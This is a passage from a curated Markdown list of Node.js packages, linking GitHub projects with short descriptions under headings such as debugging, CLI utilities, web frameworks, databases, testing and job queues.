[smoke](https://github.com/sinedied/smoke) - File-based HTTP mock server with recording abilities. - [purest](https://github.com/simov/purest) - REST client. ### Debugging / Profiling - [debug](https://github.com/debug-js/debug) - Tiny debugging utility. - [why-is-node-running](https://github.com/mafintosh/why-is-node-running) - Node.js is running but you don't know why? - [njsTrace](https://github.com/valyouw/njstrace) - Instrument and trace your code, see all function calls, arguments, return values, as well as the time spent in each function. - [vstream](https://github.com/joyent/node-vstream) - Instrumentable streams mix-ins to inspect a pipeline of streams. - [stackman](https://github.com/watson/stackman) - Enhance an error stacktrace with code excerpts and other goodies. - [locus](https://github.com/alidavut/locus) - Starts a REPL at runtime that has access to all variables. - [0x](https://github.com/davidmarkclements/0x) - Flamegraph profiling. - [ctrace](https://github.com/automation-stack/ctrace) - Well-formatted and improved trace system calls and signals. - [leakage](https://github.com/andywer/leakage) - Write memory leak tests. - [llnode](https://github.com/nodejs/llnode) - Post-mortem analysis tool which allows you to inspect objects and get insights from a crashed Node.js process. - [thetool](https://github.com/sfninja/thetool) - Capture different CPU, memory, and other profiles for your app in Chrome DevTools friendly format. - [swagger-stats](https://github.com/slanatech/swagger-stats) - Trace API calls and monitor API performance, health, and usage metrics. - [NiM](https://github.com/june07/nim) - Manages DevTools debugging workflow. - [dats](https://github.com/immobiliare/dats) - Minimalistic and zero-dependencies [StatsD](https://github.com/statsd/statsd) client. ### Logging - [pino](https://github.com/pinojs/pino) - Extremely fast logger inspired by Bunyan. - [winston](https://github.com/winstonjs/winston) - Multi-transport async logging library. - [console-log-level](https://github.com/watson/console-log-level) - The most simple logger imaginable with support for log levels and custom prefixes. - [storyboard](https://github.com/guigrpa/storyboard) - End-to-end, hierarchical, real-time, colorful logs and stories. - [consola](https://github.com/unjs/consola) - Console logger. ### Command-line utilities - [chalk](https://github.com/chalk/chalk) - Terminal string styling done right. - [meow](https://github.com/sindresorhus/meow) - CLI app helper. - [yargs](https://github.com/yargs/yargs) - Command-line parser that automatically generates an elegant user-interface. - [ora](https://github.com/sindresorhus/ora) - Elegant terminal spinner. - [get-stdin](https://github.com/sindresorhus/get-stdin) - Easier stdin. - [log-update](https://github.com/sindresorhus/log-update) - Log by overwriting the previous output in the terminal. Useful for rendering progress bars, animations, etc. - [Ink](https://github.com/vadimdemedes/ink) - React for interactive command-line apps. - [listr](https://github.com/samverschueren/listr) - Terminal task list. - [conf](https://github.com/sindresorhus/conf) - Simple config handling for your app or module. - [ansi-escapes](https://github.com/sindresorhus/ansi-escapes) - ANSI escape codes for manipulating the terminal. - [log-symbols](https://github.com/sindresorhus/log-symbols) - Colored symbols for various log levels. - [figures](https://github.com/sindresorhus/figures) - Unicode symbols with Windows CMD fallbacks. - [boxen](https://github.com/sindresorhus/boxen) - Create boxes in the terminal. - [terminal-link](https://github.com/sindresorhus/terminal-link) - Create clickable links in the terminal. - [terminal-image](https://github.com/sindresorhus/terminal-image) - Display images in the terminal. - [string-width](https://github.com/sindresorhus/string-width) - Get the visual width of a string - the number of columns required to display it. - [cli-truncate](https://github.com/sindresorhus/cli-truncate) - Truncate a string to a specific width in the terminal. - [blessed](https://github.com/chjj/blessed) - Curses-like library. - [Inquirer.js](https://github.com/SBoudrias/Inquirer.js) - Interactive command-line prompt. - [yn](https://github.com/sindresorhus/yn) - Parse yes/no like values. - [cli-table3](https://github.com/cli-table/cli-table3) - Pretty unicode tables. - [drawille](https://github.com/madbence/node-drawille) - Draw on the terminal with unicode braille characters. - [ascii-charts](https://github.com/jstrace/chart) - ASCII bar chart in the terminal. - [progress](https://github.com/visionmedia/node-progress) - Flexible ascii progress bar. - [insight](https://github.com/yeoman/insight) - Helps you understand how your tool is being used by anonymously reporting usage metrics to Google Analytics. - [cli-cursor](https://github.com/sindresorhus/cli-cursor) - Toggle the CLI cursor. - [cli-columns](https://github.com/shannonmoeller/cli-columns) - Columnated unicode and ansi-safe text lists. - [cfonts](https://github.com/dominikwilkowski/cfonts) - Sexy ASCII fonts for the console. - [multispinner](https://github.com/codekirei/node-multispinner) - Multiple, simultaneous, individually controllable CLI spinners. - [omelette](https://github.com/f/omelette) - Shell autocompletion helper. - [cross-env](https://github.com/kentcdodds/cross-env) - Set environment variables cross-platform. - [shelljs](https://github.com/shelljs/shelljs) - Portable Unix shell commands. - [sudo-block](https://github.com/sindresorhus/sudo-block) - Block users from running your app with root permissions. - [sparkly](https://github.com/sindresorhus/sparkly) - Generate sparklines `▁▂▃▅▂▇`. - [Bit](https://github.com/teambit/bit) - Create, maintain, find and use small modules and components across repositories. - [gradient-string](https://github.com/bokub/gradient-string) - Beautiful color gradients in terminal output. - [oclif](https://github.com/oclif/oclif) - CLI framework complete with parser, automatic documentation, testing, and plugins. - [term-size](https://github.com/sindresorhus/term-size) - Reliably get the terminal window size. - [Cliffy](https://github.com/drew-y/cliffy) - Framework for interactive CLIs. - [zx](https://github.com/google/zx) - Write shell scripts JavaScript. ### Build tools - [parcel](https://github.com/parcel-bundler/parcel) - Blazing fast, zero config web app bundler. - [webpack](https://github.com/webpack/webpack) - Packs modules and assets for the browser. - [rollup](https://github.com/rollup/rollup) - Next-generation ES2015 module bundler. - [gulp](https://github.com/gulpjs/gulp) - Streaming and fast build system that favors code over config. - [Broccoli](https://github.com/broccolijs/broccoli) - Fast, reliable asset pipeline, supporting constant-time rebuilds and compact build definitions. - [Brunch](https://github.com/brunch/brunch) - Front-end web app build tool with simple declarative config, fast incremental compilation, and an opinionated workflow. - [FuseBox](https://github.com/fuse-box/fuse-box) - Fast build system that combines the power of webpack, JSPM and SystemJS, with first-class TypeScript support. - [pkg](https://github.com/vercel/pkg) - Package your Node.js project into an executable. - [Vite](https://github.com/vitejs/vite) - Front-end build tool with hot module replacement and static asset bundling. ### Hardware - [johnny-five](https://github.com/rwaldron/johnny-five) - Firmata based Arduino Framework. - [serialport](https://github.com/serialport/node-serialport) - Access serial ports for reading and writing. - [usb](https://github.com/node-usb/node-usb) - USB library. - [i2c-bus](https://github.com/fivdi/i2c-bus) - I2C serial bus access. - [onoff](https://github.com/fivdi/onoff) - GPIO access and interrupt detection. - [spi-device](https://github.com/fivdi/spi-device) - SPI serial bus access. - [pigpio](https://github.com/fivdi/pigpio) - Fast GPIO, PWM, servo control, state change notification, and interrupt handling on the Raspberry Pi. - [gps](https://github.com/infusion/GPS.js) - NMEA parser for handling GPS receivers. - [modbus-serial](https://github.com/yaacov/node-modbus-serial) - A pure JavaScript implementation of MODBUS-RTU (serial and TCP). ### Templating - [marko](https://github.com/marko-js/marko) - HTML-based templating engine that compiles templates to CommonJS modules and supports streaming, async rendering and custom tags. - [nunjucks](https://github.com/mozilla/nunjucks) - Templating engine with inheritance, asynchronous control, and more (jinja2 inspired). - [handlebars.js](https://github.com/handlebars-lang/handlebars.js) - Superset of Mustache templates which adds powerful features like helpers and more advanced blocks. - [EJS](https://github.com/mde/ejs) - Simple unopinionated templating language. - [Pug](https://github.com/pugjs/pug) - High-performance template engine heavily influenced by Haml. ### Web frameworks - [Fastify](https://github.com/fastify/fastify) - Fast and low overhead web framework. - [Next.js](https://github.com/vercel/next.js) - Minimalistic framework for server-rendered universal JavaScript web apps. - [Nuxt.js](https://github.com/nuxt/nuxt.js) - Minimalistic framework for server-rendered Vue.js apps. - [Hapi](https://github.com/hapijs/hapi) - Framework for building applications and services. - [Micro](https://github.com/vercel/micro) - Minimalistic microservice framework with an async approach. - [Koa](https://github.com/koajs/koa) - Framework designed by the team behind Express, which aims to be a smaller, more expressive, and more robust foundation for web applications and APIs. - [Express](https://github.com/expressjs/express) - Web application framework, providing a robust set of features for building single and multi-page, and hybrid web applications. - [Feathers](https://github.com/feathersjs/feathers) - Microservice framework built in the spirit of Express. - [LoopBack](https://github.com/loopbackio/loopback-next) - Powerful framework for creating REST APIs and easily connecting to backend data sources. - [Meteor](https://github.com/meteor/meteor) - An ultra-simple, database-everywhere, data-on-the-wire, pure-Javascript web framework. *(You might like [awesome-meteor](https://github.com/Urigo/awesome-meteor))* - [Restify](https://github.com/restify/node-restify) - Enables you to build correct REST web services. - [ThinkJS](https://github.com/thinkjs/thinkjs) - Framework with ES2015+ support, WebSockets, REST API. - [ActionHero](https://github.com/actionhero/actionhero) - Framework for making reusable & scalable APIs for TCP sockets, WebSockets, and HTTP clients. - [seneca](https://github.com/senecajs/seneca) - Toolkit for writing microservices. - [AdonisJs](https://github.com/adonisjs/core) - A true MVC framework for Node.js built on solid foundations of Dependency Injection and IoC container. - [Moleculer](https://github.com/moleculerjs/moleculer) - Fast & powerful microservices framework. - [Nest](https://github.com/nestjs/nest) - Angular-inspired framework for building efficient and scalable server-side apps. - [TypeGraphQL](https://github.com/MichalLytek/type-graphql) - Modern framework for creating GraphQL APIs with TypeScript, using classes and decorators. - [Tinyhttp](https://github.com/tinyhttp/tinyhttp) - Modern and fast Express-like web framework. - [Marble.js](https://github.com/marblejs/marble) - Functional reactive framework for building server-side apps, based on TypeScript and RxJS. - [Lad](https://github.com/ladjs/lad) - Framework made by a former Express TC and Koa member that bundles web, API, job, and proxy servers. - [Ts.ED](https://github.com/tsedio/tsed) - Intituive TypeScript framework for building server-side apps on top of Express.js or Koa.js. ### Documentation - [documentation.js](https://github.com/documentationjs/documentation) - API documentation generator with support for ES2015+ and flow annotation. - [Docco](https://github.com/jashkenas/docco) - Documentation generator which produces an HTML document that displays your comments intermingled with your code. - [JSDoc](https://github.com/jsdoc/jsdoc) - API documentation generator similar to JavaDoc or PHPDoc. - [Docusaurus](https://github.com/facebook/docusaurus) - Documentation website generator that leverages React and Markdown, and comes with translation and versioning features. ### Filesystem - [del](https://github.com/sindresorhus/del) - Delete files/folders using globs. - [globby](https://github.com/sindresorhus/globby) - Glob files with support for multiple patterns. - [cpy](https://github.com/sindresorhus/cpy) - Copy files. - [chokidar](https://github.com/paulmillr/chokidar) - Filesystem watcher which stabilizes events from `fs.watch` and `fs.watchFile` as well as using native `fsevents` on macOS. - [find-up](https://github.com/sindresorhus/find-up) - Find a file by walking up parent directories. - [proper-lockfile](https://github.com/moxystudio/node-proper-lockfile) - Inter-process and inter-machine lockfile utility. - [load-json-file](https://github.com/sindresorhus/load-json-file) - Read and parse a JSON file. - [write-json-file](https://github.com/sindresorhus/write-json-file) - Stringify and write JSON to a file atomically. - [fs-write-stream-atomic](https://github.com/npm/fs-write-stream-atomic) - Like `fs.createWriteStream()`, but atomic. - [filenamify](https://github.com/sindresorhus/filenamify) - Convert a string to a valid filename. - [lnfs](https://github.com/kevva/lnfs) - Force create symlinks like `ln -fs`. - [istextorbinary](https://github.com/bevry/istextorbinary) - Check if a file is text or binary. - [fs-jetpack](https://github.com/szwacz/fs-jetpack) - Completely redesigned file system API for convenience in everyday use. - [fs-extra](https://github.com/jprichardson/node-fs-extra) - Extra methods for the `fs` module. - [pkg-dir](https://github.com/sindresorhus/pkg-dir) - Find the root directory of an npm package. - [filehound](https://github.com/nspragg/filehound) - Flexible and fluent interface for searching the file system. - [move-file](https://github.com/sindresorhus/move-file) - Move a file, even works across devices. - [tempy](https://github.com/sindresorhus/tempy) - Get a random temporary file or directory path. ### Control flow - Promises - [pify](https://github.com/sindresorhus/pify) - Promisify a callback-style function. - [delay](https://github.com/sindresorhus/delay) - Delay a promise a specified amount of time. - [promise-memoize](https://github.com/nodeca/promise-memoize) - Memoize promise-returning functions, with expire and prefetch. - [valvelet](https://github.com/lpinca/valvelet) - Limit the execution rate of a promise-returning function. - [p-map](https://github.com/sindresorhus/p-map) - Map over promises concurrently. - [More…](https://github.com/sindresorhus/promise-fun) - Observables - [RxJS](https://github.com/ReactiveX/RxJS) - Reactive programming. - [observable-to-promise](https://github.com/sindresorhus/awesome-observables) - Convert an Observable to a Promise. - [More…](https://github.com/sindresorhus/awesome-observables) - Streams - [Highland.js](https://github.com/caolan/highland) - Manages synchronous and asynchronous code easily, using nothing more than standard JavaScript and Node-like Streams. ### Streams - [get-stream](https://github.com/sindresorhus/get-stream) - Get a stream as a string or buffer. - [from2](https://github.com/hughsk/from2) - Convenience wrapper for ReadableStream, inspired by `through2`. - [into-stream](https://github.com/sindresorhus/into-stream) - Convert a buffer/string/array/object into a stream. - [duplexify](https://github.com/mafintosh/duplexify) - Turn a writeable and readable stream into a single streams2 duplex stream. - [pumpify](https://github.com/mafintosh/pumpify) - Combine an array of streams into a single duplex stream. - [peek-stream](https://github.com/mafintosh/peek-stream) - Transform stream that lets you peek the first line before deciding how to parse it. - [binary-split](https://github.com/maxogden/binary-split) - Newline (or any delimiter) splitter stream. - [byline](https://github.com/jahewson/node-byline) - Super-simple line-by-line Stream reader. - [first-chunk-stream](https://github.com/sindresorhus/first-chunk-stream) - Transform the first chunk in a stream. - [pad-stream](https://github.com/sindresorhus/pad-stream) - Pad each line in a stream. - [multistream](https://github.com/feross/multistream) - Combine multiple streams into a single stream. - [readable-stream](https://github.com/nodejs/readable-stream) - Mirror of Streams2 and Streams3 implementations in core. - [through2-concurrent](https://github.com/almost/through2-concurrent) - Transform object streams concurrently. ### Real-time - [µWebSockets](https://github.com/uNetworking/uWebSockets) - Highly scalable WebSocket server & client library. - [Socket.io](https://github.com/socketio/socket.io) - Enables real-time bidirectional event-based communication. - [Faye](https://github.com/faye/faye) - Real-time client-server message bus, based on Bayeux protocol. - [SocketCluster](https://github.com/SocketCluster/socketcluster) - Scalable HTTP + WebSocket engine which can run on multiple CPU cores. - [Primus](https://github.com/primus/primus) - An abstraction layer for real-time frameworks to prevent module lock-in. - [deepstream.io](https://github.com/deepstreamIO/deepstream.io-client-js) - Scalable real-time microservice framework. - [Kalm](https://github.com/kalm/kalm.js) - Low-level socket router and middleware framework. - [MQTT.js](https://github.com/mqttjs/MQTT.js) - Client for MQTT - Pub-sub based messaging protocol for use on top of TCP/IP. - [rpc-websockets](https://github.com/elpheria/rpc-websockets) - JSON-RPC 2.0 implementation over WebSockets. - [Aedes](https://github.com/moscajs/aedes) - Barebone MQTT server that can run on any stream server. ### Image - [sharp](https://github.com/lovell/sharp) - The fastest module for resizing JPEG, PNG, WebP and TIFF images. - [image-type](https://github.com/sindresorhus/image-type) - Detect the image type of a Buffer/Uint8Array. - [gm](https://github.com/aheckmann/gm) - GraphicsMagick and ImageMagick wrapper. - [lwip](https://github.com/EyalAr/lwip) - Lightweight image processor which does not require ImageMagick. - [pica](https://github.com/nodeca/pica) - High quality & fast resize (lanczos3) in pure JS. Alternative to canvas drawImage(), when no pixelation allowed. - [jimp](https://github.com/oliver-moran/jimp) - Image processing in pure JavaScript. - [probe-image-size](https://github.com/nodeca/probe-image-size) - Get the size of most image formats without a full download. - [qrcode](https://github.com/soldair/node-qrcode) - QR code and bar code generator. - [ImageScript](https://github.com/matmen/ImageScript) - Image processing in JavaScript, utilizing WebAssembly for performance. ### Text - [iconv-lite](https://github.com/ashtuchkin/iconv-lite) - Convert character encodings. - [string-length](https://github.com/sindresorhus/string-length) - Get the real length of a string - by correctly counting astral symbols and ignoring ansi escape codes. - [camelcase](https://github.com/sindresorhus/camelcase) - Convert a dash/dot/underscore/space separated string to camelCase: foo-bar → fooBar. - [escape-string-regexp](https://github.com/sindresorhus/escape-string-regexp) - Escape RegExp special characters. - [splice-string](https://github.com/sindresorhus/splice-string) - Remove or replace part of a string like `Array#splice`. - [indent-string](https://github.com/sindresorhus/indent-string) - Indent each line in a string. - [strip-indent](https://github.com/sindresorhus/strip-indent) - Strip leading whitespace from every line in a string. - [detect-indent](https://github.com/sindresorhus/detect-indent) - Detect the indentation of code. - [he](https://github.com/mathiasbynens/he) - HTML entity encoder/decoder. - [i18n-node](https://github.com/mashpie/i18n-node) - Simple translation module with dynamic JSON storage. - [babelfish](https://github.com/nodeca/babelfish) - i18n with very easy syntax for plurals. - [matcher](https://github.com/sindresorhus/matcher) - Simple wildcard matching. - [unhomoglyph](https://github.com/nodeca/unhomoglyph) - Normalize visually similar unicode characters. - [i18next](https://github.com/i18next/i18next) - Internationalization framework. - [nanoid](https://github.com/ai/nanoid) - Tiny, secure, URL-friendly, unique string ID generator. - [StegCloak](https://github.com/kurolabs/stegcloak) - Conceal secrets within strings, in plain sight. ### Number - [random-int](https://github.com/sindresorhus/random-int) - Generate a random integer. - [random-float](https://github.com/sindresorhus/random-float) - Generate a random float. - [unique-random](https://github.com/sindresorhus/unique-random) - Generate random numbers that are consecutively unique. - [round-to](https://github.com/sindresorhus/round-to) - Round a number to a specific number of decimal places: `1.234` → `1.2`. ### Math - [ndarray](https://github.com/scijs/ndarray) - Multidimensional arrays. - [mathjs](https://github.com/josdejong/mathjs) - An extensive math library. - [math-clamp](https://github.com/sindresorhus/math-clamp) - Clamp a number. - [algebra](https://github.com/fibo/algebra) - Algebraic structures. - [multimath](https://github.com/nodeca/multimath) - Core to create fast image math in WebAssembly and JS. ### Date - [Luxon](https://github.com/moment/luxon) - Library for working with dates and times. - [date-fns](https://github.com/date-fns/date-fns) - Modern date utility. - [Day.js](https://github.com/iamkun/dayjs) - Immutable date library alternative to Moment.js. - [dateformat](https://github.com/felixge/node-dateformat) - Date formatting. - [tz-format](https://github.com/samverschueren/tz-format) - Format a date with timezone: `2015-11-30T10:40:35+01:00`. - [cctz](https://github.com/floatdrop/node-cctz) - Fast parsing, formatting, and timezone conversation for dates. ### URL - [normalize-url](https://github.com/sindresorhus/normalize-url) - Normalize a URL. - [humanize-url](https://github.com/sindresorhus/humanize-url) - Humanize a URL: https://sindresorhus.com → sindresorhus.com. - [url-unshort](https://github.com/nodeca/url-unshort) - Expand shortened URLs. - [speakingurl](https://github.com/pid/speakingurl) - Generate a slug from a string with transliteration. - [linkify-it](https://github.com/markdown-it/linkify-it) - Link patterns detector with full unicode support. - [url-pattern](https://github.com/snd/url-pattern) - Easier than regex string matching patterns for URLs and other strings. - [embedza](https://github.com/nodeca/embedza) - Create HTML snippets/embeds from URLs using info from oEmbed, Open Graph, meta tags. ### Data validation - [joi](https://github.com/sideway/joi) - Object schema description language and validator for JavaScript objects. - [is-my-json-valid](https://github.com/mafintosh/is-my-json-valid) - JSON Schema validator that uses code generation to be extremely fast. - [property-validator](https://github.com/nettofarah/property-validator) - Easy property validation for Express. - [schema-inspector](https://github.com/schema-inspector/schema-inspector) - JSON API sanitization and validation. - [ajv](https://github.com/ajv-validator/ajv) - The fastest JSON Schema validator. Supports v5, v6 and v7 proposals. - [Superstruct](https://github.com/ianstormtaylor/superstruct) - Simple and composable way to validate data in JavaScript (and TypeScript). - [yup](https://github.com/jquense/yup) - Object schema validation. ### Parsing - [remark](https://github.com/remarkjs/remark) - Markdown processor powered by plugins. - [markdown-it](https://github.com/markdown-it/markdown-it) - Markdown parser with 100% CommonMark support, extensions and syntax plugins. - [parse5](https://github.com/inikulin/parse5) - Fast full-featured spec compliant HTML parser. - [@parcel/css](https://github.com/parcel-bundler/parcel-css) - A CSS parser, transformer, and minifier written in Rust. - [strip-json-comments](https://github.com/sindresorhus/strip-json-comments) - Strip comments from JSON. - [strip-css-comments](https://github.com/sindresorhus/strip-css-comments) - Strip comments from CSS. - [parse-json](https://github.com/sindresorhus/parse-json) - Parse JSON with more helpful errors. - [URI.js](https://github.com/medialize/URI.js) - URL mutation. - [JSONStream](https://github.com/dominictarr/JSONStream) - Streaming JSON.parse and stringify. - [neat-csv](https://github.com/sindresorhus/neat-csv) - Fast CSV parser. Callback interface for the above. - [csv-parser](https://github.com/mafintosh/csv-parser) - Streaming CSV parser that aims to be faster than everyone else. - [PEG.js](https://github.com/pegjs/pegjs) - Simple parser generator that produces fast parsers with excellent error reporting. - [x-ray](https://github.com/matthewmueller/x-ray) - Web scraping utility. - [nearley](https://github.com/kach/nearley) - Simple, fast, powerful parsing for JavaScript. - [binary-extract](https://github.com/juliangruber/binary-extract) - Extract a value from a buffer of JSON without parsing the whole thing. - [Stylecow](https://github.com/stylecow/stylecow) - Parse, manipulate and convert modern CSS to make it compatible with all browsers. Extensible with plugins. - [js-yaml](https://github.com/nodeca/js-yaml) - Very fast YAML parser. - [xml2js](https://github.com/Leonidas-from-XIV/node-xml2js) - XML to JavaScript object converter. - [Jison](https://github.com/zaach/jison) - Friendly JavaScript parser generator. It shares genes with Bison, Yacc and family. - [google-libphonenumber](https://github.com/ruimarinho/google-libphonenumber) - Parse, format, store and validate phone numbers. - [ref](https://github.com/TooTallNate/ref) - Read/write structured binary data in Buffers. - [xlsx-populate](https://github.com/dtjohnson/xlsx-populate) - Read/write Excel XLSX. - [Chevrotain](https://github.com/Chevrotain/chevrotain) - Very fast and feature rich parser building toolkit for JavaScript. - [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) - Validate and parse XML. ### Humanize - [pretty-bytes](https://github.com/sindresorhus/pretty-bytes) - Convert bytes to a human readable string: `1337` → `1.34 kB`. - [pretty-ms](https://github.com/sindresorhus/pretty-ms) - Convert milliseconds to a human readable string: `1337000000` → `15d 11h 23m 20s`. - [ms](https://github.com/vercel/ms) - Tiny millisecond conversion utility. - [pretty-error](https://github.com/AriaMinaei/pretty-error) - Errors with less clutter. - [read-art](https://github.com/Tjatse/node-readability) - Extract readable content from any page. ### Compression - [yazl](https://github.com/thejoshwolfe/yazl) - Zip. - [yauzl](https://github.com/thejoshwolfe/yauzl) - Unzip. - [Archiver](https://github.com/archiverjs/node-archiver) - Streaming interface for archive generation, supporting ZIP and TAR. - [pako](https://github.com/nodeca/pako) - High speed zlib port to pure js (deflate, inflate, gzip). - [tar-stream](https://github.com/mafintosh/tar-stream) - Streaming tar parser and generator. Also see [tar-fs](https://github.com/mafintosh/tar-fs). - [decompress](https://github.com/kevva/decompress) - Decompression module with support for `tar`, `tar.gz` and `zip` files out of the box. ### Network - [get-port](https://github.com/sindresorhus/get-port) - Get an available port. - [ipify](https://github.com/sindresorhus/ipify) - Get your public IP address. - [getmac](https://github.com/bevry/getmac) - Get the computer MAC address. - [DHCP](https://github.com/infusion/node-dhcp) - DHCP client and server. - [netcat](https://github.com/roccomuso/netcat) - Netcat port in pure JS. ### Database - Drivers - [PostgreSQL](https://github.com/brianc/node-postgres) - PostgreSQL client. Pure JavaScript and native libpq bindings. - [Redis](https://github.com/luin/ioredis) - Redis client. - [LevelUP](https://github.com/Level/levelup) - LevelDB. - [MySQL](https://github.com/mysqljs/mysql) - MySQL client. - [couchdb-nano](https://github.com/apache/couchdb-nano) - CouchDB client. - [Aerospike](https://github.com/aerospike/aerospike-client-nodejs) - Aerospike client. - [Couchbase](https://github.com/couchbase/couchnode) - Couchbase client. - [MongoDB](https://github.com/mongodb/node-mongodb-native) - MongoDB driver. - ODM / ORM - [Sequelize](https://github.com/sequelize/sequelize) - Multi-dialect ORM. Supports PostgreSQL, SQLite, MySQL, and more. - [Bookshelf](https://github.com/bookshelf/bookshelf) - ORM for PostgreSQL, MySQL and SQLite3 in the style of Backbone.js. - [Mongoose](https://github.com/Automattic/mongoose) - Elegant MongoDB object modeling. - [Waterline](https://github.com/balderdashy/waterline) - Datastore-agnostic tool that dramatically simplifies interaction with one or more databases. - [OpenRecord](https://github.com/PhilWaldmann/openrecord) - ORM for PostgreSQL, MySQL, SQLite3 and RESTful datastores. Similar to ActiveRecord. - [pg-promise](https://github.com/vitaly-t/pg-promise) - PostgreSQL framework for native SQL using promises. - [slonik](https://github.com/gajus/slonik) - PostgreSQL client with strict types, detailed logging and assertions. - [Objection.js](https://github.com/Vincit/objection.js) - Lightweight ORM built on the SQL query builder Knex. - [TypeORM](https://github.com/typeorm/typeorm) - ORM for PostgreSQL, MariaDB, MySQL, SQLite, and more. - [MikroORM](https://github.com/mikro-orm/mikro-orm) - TypeScript ORM based on Data Mapper, Unit of Work and Identity Map patterns. Supports MongoDB, PostgreSQL, MySQL and SQLite. - [Prisma](https://github.com/prisma/prisma) - Modern database access (ORM alternative). Auto-generated and type-safe query builder in TypeScript. Supports PostgreSQL, MySQL & SQLite. - Query builder - [Knex](https://github.com/knex/knex) - Query builder for PostgreSQL, MySQL and SQLite3, designed to be flexible, portable, and fun to use. - Other - [NeDB](https://github.com/louischatriot/nedb) - Embedded persistent database written in JavaScript. - [Lowdb](https://github.com/typicode/lowdb) - Small JavaScript database powered by Lodash. - [Keyv](https://github.com/jaredwray/keyv) - Simple key-value storage with support for multiple backends. - [Finale](https://github.com/tommybananas/finale) - RESTful endpoint generator for your Sequelize models. - [database-js](https://github.com/mlaanderson/database-js) - Wrapper for multiple databases with a JDBC-like connection. - [Mongo Seeding](https://github.com/pkosiec/mongo-seeding) - Populate MongoDB databases with JavaScript and JSON files. - [@databases](https://github.com/ForbesLindesay/atdatabases) - Query PostgreSQL, MySQL and SQLite3 with plain SQL without risking SQL injection. - [pg-mem](https://github.com/oguimbal/pg-mem) - In-memory PostgreSQL instance for your tests. ### Testing - [AVA](https://github.com/avajs/ava) - Futuristic test runner. - [Mocha](https://github.com/mochajs/mocha) - Feature-rich test framework making asynchronous testing simple and fun. - [nyc](https://github.com/istanbuljs/nyc) - Code coverage tool built on istanbul that works with subprocesses. - [tap](https://github.com/tapjs/node-tap) - TAP test framework. - [tape](https://github.com/substack/tape) - TAP-producing test harness. - [power-assert](https://github.com/power-assert-js/power-assert) - Provides descriptive assertion messages through the standard assert interface. - [Mochify](https://github.com/mantoni/mochify.js) - TDD with Browserify, Mocha, PhantomJS and WebDriver. - [trevor](https://github.com/vadimdemedes/trevor) - Run tests against multiple versions of Node.js without switching versions manually or pushing to Travis CI. - [loadtest](https://github.com/alexfernandez/loadtest) - Run load tests for your web application, with an API for automation. - [Sinon.JS](https://github.com/sinonjs/sinon) - Test spies, stubs and mocks. - [navit](https://github.com/nodeca/navit) - PhantomJS / SlimerJS wrapper to simplify browser test scripting. - [Nock](https://github.com/nock/nock) - HTTP mocking and expectations. - [intern](https://github.com/theintern/intern) - Code testing stack. - [toxy](https://github.com/h2non/toxy) - Hackable HTTP proxy to simulate failure scenarios and network conditions. - [hook-std](https://github.com/sindresorhus/hook-std) - Hook and modify stdout/stderr. - [testen](https://github.com/egoist/testen) - Run tests for multiple versions of Node.js locally with NVM. - [Nightwatch](https://github.com/nightwatchjs/nightwatch) - Automated UI testing framework based on Selenium WebDriver. - [WebdriverIO](https://github.com/webdriverio/webdriverio) - Automated testing based on the WebDriver protocol. - [Jest](https://github.com/facebook/jest) - Painless JavaScript testing. - [TestCafe](https://github.com/DevExpress/testcafe) - Automated browser testing. - [abstruse](https://github.com/bleenco/abstruse) - Continuous Integration server. - [CodeceptJS](https://github.com/codeceptjs/CodeceptJS) - End-to-end testing. - [Puppeteer](https://github.com/puppeteer/puppeteer) - Headless Chrome. - [Playwright](https://github.com/microsoft/playwright) - Headless Chromium, WebKit, and Firefox with a single API. - [nve](https://github.com/ehmicky/nve) - Run any command on multiple versions of Node.js locally. - [axe-core](https://github.com/dequelabs/axe-core) - Accessibility engine for automated Web UI testing. - [testcontainers-node](https://github.com/testcontainers/testcontainers-node) - Provides lightweight, throwaway instances of common databases, Selenium web browsers, or anything else that can run in a Docker container. ### Security - [upash](https://github.com/simonepri/upash) - Unified API for all password hashing algorithms. - [themis](https://github.com/cossacklabs/themis) - Multilanguage framework for making typical encryption schemes easy to use: data at rest, authenticated data exchange, transport protection, authentication, and so on. - [GuardRails](https://github.com/apps/guardrails) - GitHub app that provides security feedback in pull requests. - [rate-limiter-flexible](https://github.com/animir/node-rate-limiter-flexible) - Brute-force and DDoS attack protection. - [crypto-hash](https://github.com/sindresorhus/crypto-hash) - Async non-blocking hashing. - [jose-simple](https://github.com/davesag/jose-simple) - Encryption and decryption of data using the JOSE (JSON Object Signing and Encryption) standard. ### Benchmarking - [Benchmark.js](https://github.com/bestiejs/benchmark.js) - Benchmarking library that supports high-resolution timers and returns statistically significant results. ### Minifiers - [babel-minify](https://github.com/babel/minify) - ES2015+ aware minifier based on the Babel toolchain. - [UglifyJS2](https://github.com/mishoo/UglifyJS) - JavaScript minifier. - [clean-css](https://github.com/clean-css/clean-css) - CSS minifier. - [minimize](https://github.com/Swaagie/minimize) - HTML minifier. - [imagemin](https://github.com/imagemin/imagemin) - Image minifier. ### Authentication - [Passport](https://github.com/jaredhanson/passport) - Simple, unobtrusive authentication. - [Grant](https://github.com/simov/grant) - OAuth providers for Express, Koa, Hapi, Fastify, AWS Lambda, Azure, Google Cloud, Vercel, and many more. ### Authorization - [CASL](https://github.com/stalniy/casl) - Isomorphic authorization for UI and API. - [node-casbin](https://github.com/casbin/node-casbin) - Authorization library that supports access control models like ACL, RBAC and ABAC. ### Email - [Nodemailer](https://github.com/nodemailer/nodemailer) - The fastest way to handle email. - [emailjs](https://github.com/eleith/emailjs) - Send text/HTML emails with attachments to any SMTP server. - [email-templates](https://github.com/forwardemail/email-templates) - Create, preview, and send custom email templates. - [MJML](https://github.com/mjmlio/mjml) - Markup language designed to reduce the pain of creating responsive emails. ### Job queues - [bull](https://github.com/OptimalBits/bull) - Persistent job and message queue. - [agenda](https://github.com/agenda/agenda) - MongoDB-backed job scheduling. - [idoit](https://github.com/nodeca/idoit) - Redis-backed job queue engine with advanced job control. - [node-resque](https://github.com/actionhero/node-resque) - Redis-backed job queue. - [rsmq](https://github.com/smrchy/rsmq) - Redis-backed message queue. - [bee-queue](https://github.com/bee-queue/bee-queue) - High-performance Redis-backed job queue. - [RedisSMQ](https://github.com/weyoss/redis-smq) - Simple high-performance Redis message queue with real-time monitoring. - [sqs-consumer](https://github.com/bbc/sqs-consumer) - Build Amazon Simple Queue Service (SQS) based apps without the boilerplate. - [better-queue](https://github.com/diamondio/better-queue) - Simple and efficient job queue when you cannot use Redis. - [bullmq](https://github.com/taskforcesh/bullmq) - Persistent job and message queue. ### Node.js management - [n](https://github.com/tj/n) - Node.js version management. - [nave](https://github.com/isaacs/nave) - Virtual Environments for Node.js. - [nodeenv](https://github.com/ekalinin/nodeenv) - Node.js 